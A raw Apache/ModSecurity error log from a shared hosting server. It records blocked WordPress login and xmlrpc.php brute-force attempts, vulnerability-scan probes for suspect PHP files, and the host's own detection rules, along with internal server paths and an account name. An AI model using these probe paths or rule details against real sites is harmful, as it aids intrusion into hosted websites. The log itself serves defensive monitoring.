[Tue May 26 14:31:05.945915 2026] [security2:error] [pid 610693:tid 610927] [client 85.208.96.209:54774] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVhUTvNO3hpmlY6M8RzigAAAGg"]
[Tue May 26 14:31:07.965255 2026] [security2:error] [pid 610693:tid 610888] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhUzvNO3hpmlY6M8RzqgAAAEE"]
[Tue May 26 14:31:08.214042 2026] [security2:error] [pid 606909:tid 607063] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhU10yRtX9qA7aVUV4JwAAAJ0"]
[Tue May 26 14:31:09.640749 2026] [security2:error] [pid 610693:tid 610720] [remote 123.30.233.13:43720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVhVTvNO3hpmlY6M8RzywAAZxo"]
[Tue May 26 14:31:10.214640 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhVTvNO3hpmlY6M8Rz1gAAAH4"]
[Tue May 26 14:31:11.154618 2026] [security2:error] [pid 610693:tid 610863] [client 202.141.83.254:19776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhVzvNO3hpmlY6M8Rz5wAAACg"]
[Tue May 26 14:31:11.154907 2026] [security2:error] [pid 610693:tid 610863] [client 202.141.83.254:19776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhVzvNO3hpmlY6M8Rz5wAAACg"]
[Tue May 26 14:31:12.409141 2026] [security2:error] [pid 606909:tid 607121] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhV10yRtX9qA7aVUV4SwAAANc"]
[Tue May 26 14:31:14.416772 2026] [security2:error] [pid 610693:tid 610935] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhWTvNO3hpmlY6M8R0DwAAAHA"]
[Tue May 26 14:31:16.313114 2026] [security2:error] [pid 606909:tid 607056] [client 2a03:2880:f806:9:::0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVhWV0yRtX9qA7aVUV4UwAAllU"]
[Tue May 26 14:31:16.475132 2026] [security2:error] [pid 610693:tid 610843] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhXDvNO3hpmlY6M8R0jwAAABQ"]
[Tue May 26 14:31:17.698684 2026] [security2:error] [pid 610693:tid 610841] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhXTvNO3hpmlY6M8R0ngAAABI"]
[Tue May 26 14:31:19.286468 2026] [security2:error] [pid 610693:tid 610707] [remote 209.42.19.17:46688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVhXzvNO3hpmlY6M8R0sgAAGw0"]
[Tue May 26 14:31:19.943707 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhXzvNO3hpmlY6M8R0ugAAACg"]
[Tue May 26 14:31:20.722600 2026] [security2:error] [pid 606909:tid 607007] [remote 91.210.171.209:44152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVhYF0yRtX9qA7aVUV4nwAA0mE"]
[Tue May 26 14:31:21.519208 2026] [security2:error] [pid 606909:tid 607084] [client 202.141.83.254:19891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhYV0yRtX9qA7aVUV4qAAAALI"]
[Tue May 26 14:31:21.519322 2026] [security2:error] [pid 606909:tid 607084] [client 202.141.83.254:19891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhYV0yRtX9qA7aVUV4qAAAALI"]
[Tue May 26 14:31:21.854437 2026] [security2:error] [pid 610693:tid 610716] [remote 79.99.41.110:42926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.41.99.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVhYTvNO3hpmlY6M8R07gAAAhY"]
[Tue May 26 14:31:22.293773 2026] [security2:error] [pid 610693:tid 610873] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhYTvNO3hpmlY6M8R08gAAADI"]
[Tue May 26 14:31:23.093889 2026] [security2:error] [pid 610693:tid 610900] [client 178.238.232.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhYzvNO3hpmlY6M8R1CAAAAE0"]
[Tue May 26 14:31:23.099635 2026] [security2:error] [pid 610693:tid 610854] [client 178.238.232.185:34158] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVhYjvNO3hpmlY6M8R1AwAAAB8"]
[Tue May 26 14:31:23.893042 2026] [security2:error] [pid 606909:tid 607099] [client 178.238.232.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhY10yRtX9qA7aVUV4vQAAAME"]
[Tue May 26 14:31:23.893763 2026] [security2:error] [pid 606909:tid 607136] [client 178.238.232.185:34174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVhY10yRtX9qA7aVUV4uwAAAOY"]
[Tue May 26 14:31:25.098357 2026] [security2:error] [pid 610693:tid 610914] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhZDvNO3hpmlY6M8R1IAAAAFs"]
[Tue May 26 14:31:26.566552 2026] [security2:error] [pid 610693:tid 610824] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhZjvNO3hpmlY6M8R1OwAAAAE"]
[Tue May 26 14:31:27.163773 2026] [security2:error] [pid 610693:tid 610900] [client 146.174.183.157:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhZjvNO3hpmlY6M8R1RgAAAE0"]
[Tue May 26 14:31:28.239328 2026] [security2:error] [pid 610693:tid 610894] [client 45.205.1.28:52536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahVhaDvNO3hpmlY6M8R1ZAAAAEc"]
[Tue May 26 14:31:28.558679 2026] [security2:error] [pid 610693:tid 610929] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhaDvNO3hpmlY6M8R1YwAAAGo"]
[Tue May 26 14:31:30.715187 2026] [security2:error] [pid 606909:tid 607080] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhal0yRtX9qA7aVUV5AAAAAK4"]
[Tue May 26 14:31:31.851062 2026] [security2:error] [pid 606909:tid 607104] [client 202.141.83.254:19938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVha10yRtX9qA7aVUV5KAAAAMY"]
[Tue May 26 14:31:31.851613 2026] [security2:error] [pid 606909:tid 607104] [client 202.141.83.254:19938] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVha10yRtX9qA7aVUV5KAAAAMY"]
[Tue May 26 14:31:32.695331 2026] [security2:error] [pid 606909:tid 607062] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhbF0yRtX9qA7aVUV5MAAAAJw"]
[Tue May 26 14:31:34.647559 2026] [security2:error] [pid 610693:tid 610881] [client 154.161.32.97:56479] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhbjvNO3hpmlY6M8R1rAAAADo"]
[Tue May 26 14:31:34.647709 2026] [security2:error] [pid 610693:tid 610881] [client 154.161.32.97:56479] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhbjvNO3hpmlY6M8R1rAAAADo"]
[Tue May 26 14:31:34.764730 2026] [security2:error] [pid 606909:tid 607066] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhbl0yRtX9qA7aVUV5RQAAAKA"]
[Tue May 26 14:31:36.684384 2026] [security2:error] [pid 610693:tid 610941] [client 190.121.236.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVhcDvNO3hpmlY6M8R1wQAAAHY"]
[Tue May 26 14:31:36.866359 2026] [security2:error] [pid 610693:tid 610950] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhcDvNO3hpmlY6M8R1yQAAAH8"]
[Tue May 26 14:31:38.474954 2026] [security2:error] [pid 606909:tid 607120] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhcl0yRtX9qA7aVUV5fwAAANY"]
[Tue May 26 14:31:38.795278 2026] [security2:error] [pid 610693:tid 610733] [remote 103.27.200.76:45554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVhcjvNO3hpmlY6M8R16wAAQyc"]
[Tue May 26 14:31:39.333607 2026] [security2:error] [pid 606909:tid 607032] [remote 211.23.68.235:10692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVhc10yRtX9qA7aVUV5jwAAr3o"]
[Tue May 26 14:31:39.937583 2026] [security2:error] [pid 610693:tid 610749] [remote 143.244.182.226:34392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.182.244.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVhczvNO3hpmlY6M8R19AAAADc"]
[Tue May 26 14:31:41.045128 2026] [security2:error] [pid 610693:tid 610923] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhdDvNO3hpmlY6M8R2BAAAAGQ"]
[Tue May 26 14:31:42.370968 2026] [security2:error] [pid 610693:tid 610865] [client 202.141.83.254:5668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhdjvNO3hpmlY6M8R2EAAAACo"]
[Tue May 26 14:31:42.371098 2026] [security2:error] [pid 610693:tid 610865] [client 202.141.83.254:5668] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhdjvNO3hpmlY6M8R2EAAAACo"]
[Tue May 26 14:31:43.134594 2026] [security2:error] [pid 606909:tid 607135] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhdl0yRtX9qA7aVUV50QAAAOU"]
[Tue May 26 14:31:45.313379 2026] [security2:error] [pid 606909:tid 607065] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVheF0yRtX9qA7aVUV57wAAAJ8"]
[Tue May 26 14:31:46.673186 2026] [security2:error] [pid 610693:tid 610939] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhejvNO3hpmlY6M8R2QQAAAHQ"]
[Tue May 26 14:31:46.745020 2026] [security2:error] [pid 606909:tid 607128] [client 89.221.206.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhel0yRtX9qA7aVUV6DgAAAN4"], referer: https://www.anujtradingco.com/
[Tue May 26 14:31:46.907118 2026] [security2:error] [pid 606909:tid 607067] [client 91.84.124.42:53944] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhel0yRtX9qA7aVUV6CwAAAKE"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:31:48.109905 2026] [security2:error] [pid 610693:tid 610825] [client 89.221.206.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhfDvNO3hpmlY6M8R2WQAAAAI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 14:31:48.131906 2026] [security2:error] [pid 606909:tid 607067] [client 91.84.124.42:53944] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhel0yRtX9qA7aVUV6CwAAAKE"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:31:48.131950 2026] [security2:error] [pid 606909:tid 607067] [client 91.84.124.42:53944] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhel0yRtX9qA7aVUV6CwAAAKE"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:31:49.351465 2026] [security2:error] [pid 606909:tid 607046] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhfF0yRtX9qA7aVUV6KwAAAIw"]
[Tue May 26 14:31:51.440666 2026] [security2:error] [pid 610693:tid 610846] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhfzvNO3hpmlY6M8R2dgAAABc"]
[Tue May 26 14:31:52.506731 2026] [security2:error] [pid 610693:tid 610912] [client 89.221.206.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhgDvNO3hpmlY6M8R2hgAAAFk"], referer: https://anujtradingco.com
[Tue May 26 14:31:52.648154 2026] [security2:error] [pid 606909:tid 607042] [client 202.141.83.254:19854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhgF0yRtX9qA7aVUV6cgAAAIg"]
[Tue May 26 14:31:52.648769 2026] [security2:error] [pid 606909:tid 607042] [client 202.141.83.254:19854] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhgF0yRtX9qA7aVUV6cgAAAIg"]
[Tue May 26 14:31:53.783290 2026] [core:crit] [pid 610693:tid 610887] (13)Permission denied: [client 52.167.144.140:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:31:53.893927 2026] [security2:error] [pid 610693:tid 610882] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhgTvNO3hpmlY6M8R2mQAAADs"]
[Tue May 26 14:31:55.548065 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhgzvNO3hpmlY6M8R2ywAAAEo"]
[Tue May 26 14:31:57.010931 2026] [security2:error] [pid 610693:tid 610767] [remote 167.99.5.1:49538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVhhDvNO3hpmlY6M8R28QAAIUk"]
[Tue May 26 14:31:57.279253 2026] [security2:error] [pid 610693:tid 610906] [client 146.174.163.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhhDvNO3hpmlY6M8R29wAAAFM"]
[Tue May 26 14:31:57.636511 2026] [security2:error] [pid 610693:tid 610946] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhhTvNO3hpmlY6M8R2_gAAAHs"]
[Tue May 26 14:31:58.040394 2026] [core:crit] [pid 610693:tid 610893] (13)Permission denied: [client 40.77.167.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:31:58.401689 2026] [core:error] [pid 610693:tid 610950] [client 198.235.24.165:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:31:58.401712 2026] [core:error] [pid 610693:tid 610950] [client 198.235.24.165:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:31:58.657888 2026] [security2:error] [pid 610693:tid 610785] [remote 74.7.241.58:57634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhhjvNO3hpmlY6M8R3PgAAB1s"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:31:59.294554 2026] [security2:error] [pid 610693:tid 610791] [remote 121.200.216.55:39540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVhhzvNO3hpmlY6M8R3RgAAEmE"]
